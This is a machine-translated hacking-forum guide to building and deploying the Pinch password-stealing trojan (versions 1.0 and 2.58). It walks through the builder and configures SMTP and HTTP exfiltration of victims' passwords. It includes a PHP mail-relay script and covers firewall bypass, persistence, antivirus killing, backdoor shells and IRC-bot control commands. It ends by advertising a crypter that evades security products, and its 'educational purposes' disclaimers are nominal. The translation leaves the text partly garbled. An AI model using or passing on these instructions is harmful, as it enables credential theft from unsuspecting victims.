This page has been robot translated, sorry for typos if any. Original content here.

Ламаємо мило, юзаем BrutusAET2


МАТЕРІАЛ виклали в ознайомлювальних цілях. АВТОР НЕ НЕСЕ ОТВЕТСВТЕННОСТІ


-------------------------------------------------- ----------------
частина 1. старе, але корисне. для пинч 1

***********************
Інструкція по Pinch 1.0
***********************

=====
Intro
=====

Прошу не дивуватися, що я вирішив написати подібну статтю (article for lamerzzz). Справа в тому, що на моєму форумі (http://forum.web-hack.ru) приблизно раз в три дні створюється тема, на кшталт "Як правильно налаштувати і використовувати Pinch?", "Як користуватися Pinch`ем?" і т.д.

===========
можливості
===========

Даний троян отримав досить велике поширення в 2003/2004 році. Все завдяки можливості красти велике у паролів (ICQ99b-2003a / Lite / ICQ2003Pro, Miranda IM, Trillian ICQ & AIM, & RQ, The Bat !, The Bat! 2, Outlook / Outlook Express, IE autocomplete & protected sites & ftp (9x / ME / 2000 / XP), FAR Manager (ftp), Win / Total Commander (ftp), RAS (9x / Me / 2k / xp supported)), невеликій вазі, відкритим ісходникам і легкістю створення троя для конкретного завдання. Троян має такі можливості:

- Відправляти конфігурацію комп'ютера жертви: ОС, оператіка, CPU, HDD, logged user, host name, IP
- Шпигун клавіатури (Key-log)
- Дистанційна консоль (Remote console)
- Обхід Firewall`а
- Відправка всіх паролів на E-mail використовуючи SMTP-сервер
- Шифрування вкрадених паролів пересилаються поштою
- Автовидалення трояна після запуску
- HTML / Text звіти
- Розмір файлу приблизно 10Kb
- Модульна система
- І багато іншого...

Троян написав coban2k (http://www.cobans.net) - досить відома людина в світі ICQ-хакинга. Через проблеми з хостингом з приводу зберігання трояна на їх сервері, автор був змушений прибрати це творіння з свого сайту. На жаль вже майже всі антивіруси знаходять цей трой і його можна впарити тільки жертви, у якої не варто антивіруса.

============
Комплектація
============

До архіву (pinch_1.0.zip) з трояном входять наступні папки і файли:

\ PinchBuilder.exe - майстер для створення трояна
\ Parser.exe - програма для розшифровки закодованих листів з паролями
\ Readme.txt - без коментарів
\ Pinch \ - головна папка з asm-исходниками трояна і компілятором
\ Sources \ - інші вихідні
\ TB! 2 Plugin (Auto-parser) \ - папка з плагіном для The Bat 2 !, Який декодує зашифровані листи з паролями, що приходять на вашу поштову скриньку
\ Sources \ Script \ - PHP-скрипт, через який відсилаються паролі при виборі відповідної опції при компіляції (читайте далі)

================
компілюємо трой
================

У комплекті поставляється спеціальний майстер (PinchBuilder.exe), який і займається створенням трояна по вашим вимогам і компіляцією трояна прямо на вашому комп'ютері. Програма має дві головні вкладки: Compile і Decrypt. Перша служить для створення трояна, а друга для розшифровки паролів (по суті ця вкладка є результатом роботи файлу Parser.exe). Далі йдуть три під-вкладки: SMTP, HTTP і FILE. У них задаються варіант виведення паролів. Розберемо кожну докладніше:

========
SMTP
========

В поле Server вводимо адресу (hostname / ip) SMTP-сервера. Якщо ви ввели домен сервера, то натисніть Resolve, щоб домен сервера прийняв вид IP-адреси. Далі в полях From і To вказуємо своє мило. Кнопка Send test massage служить для тестової відправки листа, через настройки вказані вами. Настійно рекомендую їй скористатися. Якщо лист не приходить, то це означає, що є якісь проблеми з відправкою (включений фаєрволл, поганий SMTP, що не натиснули на Resolve і т.д.).

Хочу зауважити, що останнім часом більшість провайдерів переходять на систему, за якою їх клієнти можуть відправити листа ТІЛЬКИ з ЇХ SMTP-Вервера. У таких випадках рекомендую користуватися методом відправки листів, через HTTP.

====
HTTP
====

Закачуємо файл \ Sources \ Script \ view.php на сервер підтримує PHP-скрипти і виконують функцію mail (). Далі в поле URL вказуємо шлях до цього скрипту (наприклад, http://www.xss.ru/pinch.php). В поле Subject вказуємо ім'я теми, з якої будуть оговтуватися письма. В поле Status check str повинна перебувати рядок, яка видається скриптом після його завантаження. В скрипті йде в комплекті з Троєм воно має значення: _ret_ok_1:

<Script language = "JavaScript">
window.status = "_ ret_ok_1";
</ Script>

Якщо дане значення не буде вжито трояном, то він буде намагатися відправити лист через цей скрипт кожну хвилину, поки не отримає у відповідь рядок з поля Status check str. Я вам рекомендую використовувати скрипт не з стандартної поставки, а написаний мною:

<Html> <body>
<? Php
// Author: Terabyte (http://www.web-hack.ru)
$ Email = $ _ POST [ 'a'];
$ Subject = $ _ POST [ 'b'];
$ Msg = $ _ POST [ 'c'];
if (isset ($ email) and isset ($ subject) and isset ($ msg)) {
mail ($ email, $ subject, $ msg, "From: $ email");}
?>
<Script language = "JavaScript">
window.status = "_ ret_ok_1";
</ Script>
</ Body> </ html>

Робить він майже те ж саме, але більш грамотно написаний. Величезним плюсом при використанні даного методу відправки паролів являєся, той факт, що він дозволяє відправляти паролі в обхід Firewall`а. Як це досягається? Ось вирізка з логу outpost`а в момент відправки пароля через скрипт з мого сайту:

Ім'я процесу: iexplorer.exe
Протокол: HTTP
Віддалений адреса: www.web-hack.ru

Я думаю всі зрозуміли, хто не в танку =) Так само з плюсів я можу я можу виділити можливість записувати зашифровані листи на вашому сайті, а не відправляти на мило; можливість міняти мило на яке відсилаються паролі, на випадок якщо його видалять; при масовому розсиланні троя (щоб паролі могли бути відправлені навіть з тих провайдерів, де відключений доступ до всіх SMTP-серверів, крім їх нього)

====
FILE
====

На даний вкладці задається шлях до файлу, в який збережуться всі паролі. Для цього в поле Path треба записати шлях до файл (наприклад, C: \ password.txt).

================
Compiler Options
================

У даній області все зрозуміло, тут треба просто поставити галочки в тих полях, де вам це потрібно. Варто звернутися увагу на поле Add Icon. У ньому вказує шлях до іконки з якої буде відображатися скомпільований троян. Хочу зауважити що на моїй системі (Windows XP) мені так і не вдалося скомпілювати троя з цією включеною опцією і її довелося відключити.

У полях Protocol вказуємо метод, яким будуть відправлятися паролі (SMTP / HTTP / FILE). Далі натискаємо кнопку Compile і повинна піти компіляція трояна, який збережеться в основну папку з майстром для його створення.

===================
розшифровка паролів
===================

Припустимо вам вдалося впарити ламеру цей трой і вам на мило прийшли паролі з машини жертви. Справа в тому, що при пересиланні паролі шифруються і їх для початку треба розшифрувати (якщо у вас не встановлений спеціальний плагін до TheBat! Описаний вище). Копіюємо в буфер обміну текст з закодованими паролями, відкриваємо Parser.exe (або вкладку Decrypt в PinchBuilder.exe) і натискаємо в контекстному меню пунк Process Data (або просто натискаємо комбінацію клавіш Alt + C). Далі програма видасть вам всі дані вкрадені у жертви з зручному вигляді. Далі ви можете їх зберегти або роздрукувати.

==========
висновок
==========

Хочу вас застерегти, що при використанні даного трояна ви відразу потрапляє під 273 статтю КК РФ і можете бути серйозно покарані ;-) Я (автор статті) НЕ несу ніякої відповідальності за шкоду, яка може бути завдана якихось особам після прочитання моєї статті.


----------------------------------------

частина 2. інструкція до пинч 2.58

Невелика статейка по елементарної настройки пинча. Не судіть строго, але критикуйте на весь рот. Стаття з налаштування Pinch 2.58.

Думаю, що з crack-ом проблем немає ніукаво, так як там докладний help і навіть відео додається. Я ж хочу показати як в билдер налаштовувати трой:

SMTP Properties
Server (вводиш, в твоєму випадку smtp.mail.ru), потім обов'язково натискаєш Resolve щоб воно перетворилося в IP (до речі. Всі махінації треба проводити при підключеному інтернеті)

Port - залишай як і є

Protocol - вибір як буде виходити звіт, по SMTP, HTTP (через php) і FILE - зберігатися на комп'ютері. Однойменні кнопки (SMTP, HTTP, FILE) настройка протоколів, але нас в даному випадку цікавить SMTP і його ми вже набудували ..

Кнопка TestSend відправка тестового повідомлення на mail.

Вкладка PWD - прет паролі з перерахованих програм. Пункт ENABLE PWD при знятті галки звіти не міститимуть паролі.
Галка Do not send old report - НЕ слати старі звіти.
Галки Encrypt і Packing взаємопов'язані. FSG, UPX, MEW вибір способу упаковки.

Вкладка RUN - вибір способів автозапуску. Думаю розберешся в ній. Запучкать як .... standart, DLL, Undelate Service. Перемістити в папку ..... або сам вказуєш або вибираєш одну з системних. Справа стовпець Values ​​я його і не чіпав і чесно кажучи смутно уявляю навіщо він. Знизу праворуч - bypass Windows Firewall (SP2) - обходити системний файрвол в SP2 (на скільки я знаю механізм цього пункту - це він запускається, як iexplorer.exe)

Вкладка SPY - які додаткові звіти - у мене воно не працювало. Пунктик screen spy - взяття скріншоту, але знову ж таки у мене воно не працювало (сркін надсилався, але він був порожній)

Вкладка NET - я їй не користувався. Вона призначена для того щоб:
1. Відкрити якийсь порт на зараженому комп'ютері, і відповідно отримати до нього доступ (настійно несоветую цим користуватися, якщо не зашіфруешься, якщо тебе зловлять, то сам здогадуєшся що буде ...)
2. Downloader - вказівка ​​прямого посилання на який-небудь файл який повинен завантажити і запуститися (прикинь, які витрати понесе твій ворог якщо у нього трафік ......))))
3. AutoUpdate - автообновление - трой, по завершенні роботи, викачує свою копію, а потім самовидаляється і на наступну завантаження системи, запускається вже нова копія (це для більшої надійності. Що б його не знайшли.

Вкладка BD (backdoor) - консоль відкриває шелл на вибраному порту, управління через телнет (telnet.exe) або альтернативні проги. (Сам не пробував)

Вкладка ECT - склейка з будь-яким файлом, а так само установка іконки ... Так само можна зробити, що б, вискакувало повідомлення ... Але щось не працює ...

Вкладка KILL - вбивство кокого-якого процесу (можна спробувати і антивірус вбити), наприклад "spidernt" - і тоді відключиться монітор DrWEB-а (попереджаю, я це ще не дала, але спробую)

Вкладка IE - установка на браузер своєї стартової сторінки. Додавання сторінки в Вибране ....

Вкладка WORM - шо ЦЕ таке, я не ведую ... .....

Вкладка IRC-bot - доступ до комп'ютера через IRC:
.login авторизація
.die - завершення роботи бота
.download - стрибка файлу з урла
.httpd - відкрити доступ до файлу через http на певному порту
.killthread - завершення певного завдання
.proxy - відкриття сокс4 з обраною порту з обраним id
.raw - відсилання raw тексту на даний irc сервер
.remove - самоудаленіе
.restart - перезапуск
.run - запускати команди
.scan - сканування IP адрес на певні відкриті порти
.shell - відкриття шелла на певному порту (не в 95/98 / ME)
.status - показати версію, IP, дату запуску
.threads - показати активні завдання
.update - самовідновлення бота зі спеціального урла
.visit - відвідати обраний урл приховано
.url - відвідати обраний урл відкрито
.link - додати в favorits
.sp - зробити стартовою
.msg - повідомлення (messagebox)

Ось начебто все .... Натискаєш COMPILE і у тебе в папці з билдер з'являється трой ...

ХАЙ ЩАСТИТЬ!!!!!

PS Це, типу, все написано для ознайомлення і автор не несе ніякої відповідальності за наслідки ...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Особливості крипта:
Використовується поліморний криптор
Обхід KIS і Outpost (в тому числі останні версії)
самоудаленіе
Зменшення розміру (Звичайний пинч зменшується на 3-6кб, лоадер zupacha на 60-80кб)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~